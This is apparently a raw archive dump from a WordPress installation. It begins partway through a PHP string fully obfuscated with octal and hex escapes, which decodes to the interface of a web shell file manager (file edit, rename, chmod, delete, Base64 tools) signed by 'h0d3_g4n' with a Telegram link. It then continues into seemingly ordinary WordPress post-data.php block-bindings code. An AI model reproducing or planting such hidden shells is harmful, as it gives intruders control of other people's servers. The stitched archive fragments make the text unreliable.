150\162\56\162\145\x73\x70\x6f\x6e\x73\x65\124\x65\170\164\73\x64\x6f\x63\x75\155\145\x6e\164\x2e\147\145\164\x45\154\145\x6d\x65\x6e\x74\102\x79\x49\144\x28\47\x6d\157\x64\141\154\x2d\146\x69\154\145\160\141\164\x68\47\51\56\166\x61\x6c\165\145\x3d\150\145\170\120\141\164\x68\73\166\141\162\40\x78\150\x72\x32\75\156\145\167\x20\130\x4d\x4c\110\164\x74\x70\122\x65\161\x75\x65\163\x74\x28\51\x3b\x78\x68\x72\x32\x2e\157\x70\x65\156\50\x27\x47\105\x54\47\54\x27\77\147\145\x74\x5f\146\x69\x6c\x65\156\x61\x6d\x65\75\x27\53\150\145\170\120\x61\164\x68\54\164\x72\165\145\51\x3b\x78\150\162\62\x2e\x6f\156\x72\145\141\x64\171\163\x74\x61\x74\x65\143\150\x61\156\147\145\75\x66\x75\x6e\x63\164\x69\x6f\156\50\51\x7b\x69\146\x28\170\150\162\62\56\x72\145\141\144\171\123\x74\x61\x74\x65\75\75\64\x26\46\x78\x68\162\62\56\163\164\x61\x74\165\x73\75\x3d\x32\x30\x30\x29\x7b\x64\157\x63\x75\155\x65\156\x74\56\147\145\164\105\x6c\145\x6d\145\156\164\102\x79\x49\144\50\x27\155\157\x64\x61\x6c\55\146\151\x6c\x65\x6e\141\x6d\145\47\51\56\151\x6e\156\145\162\x54\145\170\x74\75\170\x68\162\62\x2e\x72\145\163\160\157\x6e\163\x65\124\145\170\164\x3b\x7d\x7d\73\170\150\x72\x32\x2e\163\145\156\x64\x28\x29\x3b\144\x6f\143\165\x6d\145\x6e\x74\56\147\145\x74\105\154\145\x6d\145\x6e\164\x42\x79\111\x64\50\x27\x65\x64\x69\164\115\157\x64\x61\x6c\47\51\56\x73\x74\x79\154\145\x2e\x64\151\163\x70\154\x61\x79\75\47\142\x6c\157\x63\153\47\73\x7d\x7d\x3b\x78\150\162\56\163\145\x6e\144\x28\x29\x3b\175\146\165\156\x63\164\x69\x6f\x6e\x20\143\154\157\x73\x65\x45\144\151\x74\115\x6f\x64\x61\154\x28\x29\x7b\144\x6f\x63\x75\x6d\145\156\164\56\x67\145\164\105\x6c\145\155\145\x6e\x74\x42\171\111\x64\x28\x27\145\144\151\x74\115\157\x64\x61\x6c\47\51\56\163\164\171\154\145\x2e\x64\151\163\160\x6c\141\x79\x3d\x27\156\x6f\156\x65\47\x3b\x7d\155\x6f\144\141\154\x4d\x6f\x64\x65\x2e\x61\144\x64\105\x76\x65\x6e\x74\x4c\x69\x73\164\x65\x6e\x65\162\x28\47\143\x68\141\x6e\x67\145\47\x2c\x66\165\156\x63\x74\151\x6f\156\50\51\173\x76\x61\x72\40\x74\x3d\x6d\157\144\141\154\124\x65\170\x74\x61\162\x65\x61\x2e\x76\x61\154\165\145\x2c\x6d\x3d\x6d\157\x64\141\x6c\115\157\144\145\56\x76\141\x6c\165\x65\x3b\151\x66\50\41\x74\174\x7c\41\155\x29\162\145\x74\x75\x72\x6e\x3b\x69\x66\50\155\75\x3d\75\x27\x59\x27\51\x7b\x74\x72\x79\x7b\x6d\157\x64\x61\154\x54\x65\170\x74\x61\x72\145\x61\x2e\x76\141\154\165\145\x3d\142\x74\x6f\141\x28\x75\x6e\x65\163\143\x61\x70\x65\50\x65\156\143\157\x64\145\x55\x52\111\103\157\155\160\157\x6e\145\x6e\164\50\x74\x29\x29\51\x3b\175\143\x61\x74\x63\x68\x28\x65\x29\173\141\154\145\x72\164\x28\47\124\151\x64\141\153\x20\x62\151\163\141\40\145\x6e\x63\157\x64\145\x21\x27\x29\x3b\x7d\x7d\x65\154\163\x65\x20\151\146\50\155\x3d\x3d\x3d\x27\116\47\x29\x7b\164\162\x79\x7b\155\157\144\141\154\124\145\x78\164\x61\162\145\x61\x2e\166\x61\x6c\165\145\75\144\x65\143\x6f\x64\x65\125\x52\111\103\x6f\x6d\x70\x6f\156\145\x6e\164\x28\145\163\x63\x61\160\145\50\141\164\x6f\x62\50\164\51\51\51\x3b\x7d\x63\141\164\x63\x68\50\145\51\173\141\x6c\145\x72\164\x28\47\x54\x65\153\x73\40\x62\165\x6b\x61\x6e\x20\x42\141\163\x65\66\64\40\166\141\x6c\151\144\41\x27\x29\73\x7d\x7d\175\x29\x3b\x66\x75\156\143\164\x69\x6f\x6e\x20\x6f\x70\145\156\x52\145\156\x61\x6d\x65\115\x6f\144\x61\154\50\x70\x61\164\x68\51\x7b\144\x6f\x63\x75\155\145\156\164\x2e\x67\145\x74\105\154\x65\155\145\156\164\102\x79\x49\x64\50\x27\162\x65\x6e\x61\155\145\x2d\160\x61\164\x68\x27\x29\x2e\166\x61\154\165\x65\75\160\x61\164\150\73\x64\x6f\143\165\x6d\145\156\164\x2e\147\145\x74\x45\154\145\x6d\145\156\164\x42\171\x49\x64\x28\x27\162\145\x6e\141\155\145\x4d\157\144\141\154\x27\51\56\163\164\x79\x6c\145\x2e\x64\151\x73\160\154\x61\x79\75\47\142\154\157\x63\x6b\47\73\x7d\146\165\156\143\164\151\x6f\156\40\x63\x6c\157\163\x65\122\145\x6e\x61\x6d\x65\x4d\157\144\141\154\50\51\173\x64\x6f\143\x75\155\145\156\x74\x2e\147\145\x74\105\x6c\145\x6d\145\156\164\102\x79\111\x64\50\x27\162\x65\x6e\x61\155\x65\115\157\x64\x61\154\x27\x29\56\x73\x74\x79\x6c\145\56\144\x69\x73\160\x6c\141\x79\x3d\47\x6e\x6f\156\145\47\x3b\175\x66\x75\x6e\143\x74\151\157\156\x20\157\x70\145\156\103\x68\x6d\157\x64\115\x6f\x64\141\154\x28\160\141\164\150\x29\x7b\x64\x6f\143\x75\x6d\145\x6e\164\x2e\x67\x65\164\x45\154\145\x6d\x65\156\164\x42\171\111\x64\50\47\x63\150\155\x6f\144\x2d\x70\x61\164\x68\47\x29\x2e\x76\x61\x6c\165\145\75\x70\141\x74\x68\x3b\144\x6f\x63\x75\x6d\145\156\164\x2e\x67\145\164\x45\x6c\x65\155\x65\156\164\x42\x79\111\x64\x28\47\x63\150\x6d\157\x64\115\157\x64\x61\x6c\47\51\56\163\x74\171\154\145\56\144\151\x73\160\x6c\141\x79\75\x27\142\x6c\157\x63\153\x27\x3b\x7d\x66\x75\156\143\x74\x69\157\156\x20\143\x6c\157\x73\x65\x43\150\x6d\157\x64\115\x6f\144\x61\154\x28\51\x7b\x64\x6f\143\x75\x6d\x65\156\x74\56\x67\x65\164\x45\154\x65\155\145\156\x74\102\171\111\144\x28\47\x63\150\x6d\157\x64\115\157\144\141\x6c\x27\51\56\163\164\x79\154\145\x2e\144\x69\x73\160\x6c\141\171\75\47\x6e\157\156\x65\x27\73\x7d\146\x75\156\143\x74\151\157\156\40\157\x70\145\156\104\145\x6c\x65\x74\145\x4d\x6f\x64\x61\x6c\x28\160\141\x74\x68\51\x7b\x64\x6f\143\x75\155\x65\x6e\164\56\x67\x65\x74\x45\154\x65\x6d\145\x6e\164\x42\x79\111\144\50\47\144\x65\x6c\x65\164\145\55\160\x61\164\x68\47\x29\56\166\x61\154\165\x65\75\x70\x61\x74\150\x3b\x64\157\143\165\x6d\x65\156\x74\x2e\147\145\164\x45\154\x65\x6d\x65\x6e\x74\x42\171\111\144\50\x27\144\145\154\145\164\x65\x4d\x6f\144\141\x6c\47\51\x2e\x73\164\x79\x6c\145\x2e\x64\x69\x73\x70\154\x61\171\x3d\47\x62\154\x6f\143\x6b\47\x3b\175\146\165\156\143\164\x69\x6f\x6e\40\143\154\x6f\x73\145\104\x65\154\145\x74\x65\115\157\144\x61\x6c\50\51\x7b\144\157\x63\165\x6d\145\156\164\56\x67\145\164\x45\x6c\x65\155\x65\x6e\x74\102\x79\x49\144\x28\47\x64\145\154\145\164\x65\115\x6f\x64\141\x6c\47\x29\x2e\x73\x74\x79\154\145\x2e\x64\151\163\160\154\x61\x79\75\47\156\157\156\145\47\x3b\175\167\151\x6e\x64\157\167\x2e\x6f\x6e\143\154\x69\143\x6b\x3d\x66\x75\x6e\143\x74\x69\157\156\x28\x65\x29\x7b\151\x66\50\x65\56\164\141\162\x67\145\164\75\75\144\x6f\x63\x75\155\x65\x6e\164\56\147\x65\164\x45\154\x65\155\x65\x6e\164\x42\x79\x49\x64\50\x27\145\x64\151\164\x4d\x6f\x64\x61\154\47\51\51\x63\154\x6f\x73\145\105\x64\x69\164\115\x6f\144\x61\x6c\50\51\x3b\151\146\50\x65\56\x74\141\x72\147\145\164\x3d\x3d\144\157\143\x75\x6d\x65\x6e\x74\x2e\147\145\x74\x45\154\145\x6d\145\156\164\x42\x79\111\144\50\47\x72\x65\x6e\141\155\x65\115\x6f\x64\141\x6c\x27\x29\x29\143\154\x6f\163\x65\x52\145\156\141\155\x65\x4d\x6f\x64\141\154\50\x29\x3b\x69\x66\x28\x65\x2e\164\141\162\x67\145\x74\75\x3d\144\157\x63\165\x6d\x65\x6e\x74\56\147\x65\x74\105\x6c\x65\x6d\145\156\164\102\171\111\x64\50\x27\x63\150\x6d\x6f\144\x4d\x6f\144\141\154\47\x29\x29\143\x6c\157\x73\145\x43\150\155\157\144\115\157\144\x61\x6c\x28\x29\x3b\x69\146\50\x65\56\x74\x61\162\147\145\x74\x3d\75\144\x6f\x63\x75\x6d\145\156\164\x2e\147\145\x74\105\154\x65\155\145\x6e\164\x42\x79\111\x64\x28\x27\144\145\x6c\145\x74\145\x4d\157\144\x61\x6c\x27\x29\51\143\154\x6f\163\x65\104\145\154\145\x74\x65\x4d\157\x64\141\x6c\x28\x29\x3b\x7d\73\x3c\57\163\143\x72\151\160\x74\x3e\x3c\144\x69\x76\40\163\x74\x79\x6c\x65\75\x22\x74\x65\x78\164\55\x61\154\151\x67\156\x3a\x63\145\156\164\145\162\73\x6d\141\162\147\x69\x6e\x2d\164\x6f\x70\x3a\62\60\160\x78\73\x66\x6f\156\164\55\163\151\x7a\x65\x3a\61\x34\x70\170\73\x63\x6f\154\157\162\72\x23\x36\x36\x36\x3b\x22\x3e\xc2\xa9\40\x32\60\x32\65\x20\103\157\144\x65\x64\40\x42\x79\x20\74\x62\76\x68\x30\144\63\137\147\x34\156\74\57\x62\76\x20\174\40\x54\145\x6c\x65\147\162\x61\x6d\72\x20\74\x61\x20\150\x72\x65\x66\x3d\42\150\164\x74\160\163\x3a\x2f\x2f\164\x2e\x6d\145\x2f\150\x30\x64\63\137\147\x34\x6e\42\40\x74\x61\162\147\x65\x74\x3d\x22\137\x62\154\141\156\x6b\x22\x3e\x40\150\x30\x64\63\137\x67\64\x6e\74\x2f\141\76\74\57\144\x69\x76\x3e\74\x2f\x62\157\144\x79\x3e\x3c\57\150\x74\155\x6c\x3e\12"; ?>post-data.php000064400000005421152105264550007160 0ustar00 "foo" ). * @param WP_Block $block_instance The block instance. * @return mixed The value computed for the source. */ function _block_bindings_post_data_get_value( array $source_args, $block_instance ) { if ( empty( $source_args['field'] ) ) { // Backward compatibility for when the source argument was called `key` in Gutenberg plugin. if ( empty( $source_args['key'] ) ) { return null; } $field = $source_args['key']; } else { $field = $source_args['field']; } /* * BACKWARDS COMPATIBILITY: Hardcoded exception for navigation blocks. * Required for WordPress 6.9+ navigation blocks. DO NOT REMOVE. */ $block_name = $block_instance->name ?? ''; $is_navigation_block = in_array( $block_name, array( 'core/navigation-link', 'core/navigation-submenu' ), true ); if ( $is_navigation_block ) { // Navigation blocks: read from block attributes. $post_id = $block_instance->attributes['id'] ?? null; } else { // All other blocks: use context. $post_id = $block_instance->context['postId'] ?? null; } // If we don't have an entity ID, bail early. if ( empty( $post_id ) ) { return null; } // If a post isn't public, we need to prevent unauthorized users from accessing the post data. $post = get_post( $post_id ); if ( ( ! is_post_publicly_viewable( $post ) && ! current_user_can( 'read_post', $post_id ) ) || post_password_required( $post ) ) { return null; } if ( 'date' === $field ) { return esc_attr( get_the_date( 'c', $post_id ) ); } if ( 'modified' === $field ) { // Only return the modified date if it is later than the publishing date. if ( get_the_modified_date( 'U', $post_id ) > get_the_date( 'U', $post_id ) ) { return esc_attr( get_the_modified_date( 'c', $post_id ) ); } else { return ''; } } if ( 'link' === $field ) { $permalink = get_permalink( $post_id ); return false === $permalink ? null : esc_url( $permalink ); } } /** * Registers Post Data source in the block bindings registry. * * @since 6.9.0 * @access private */ function _register_block_bindings_post_data_source() { register_block_bindings_source( 'core/post-data', array( 'label' => _x( 'Post Data', 'block bindings source' ), 'get_value_callback' => '_block_bindings_post_data_get_value', 'uses_context' => array( 'postId', 'postType' ), // Both are needed on the client side. ) ); } add_action( 'init', '_register_block_bindings_post_data_source' );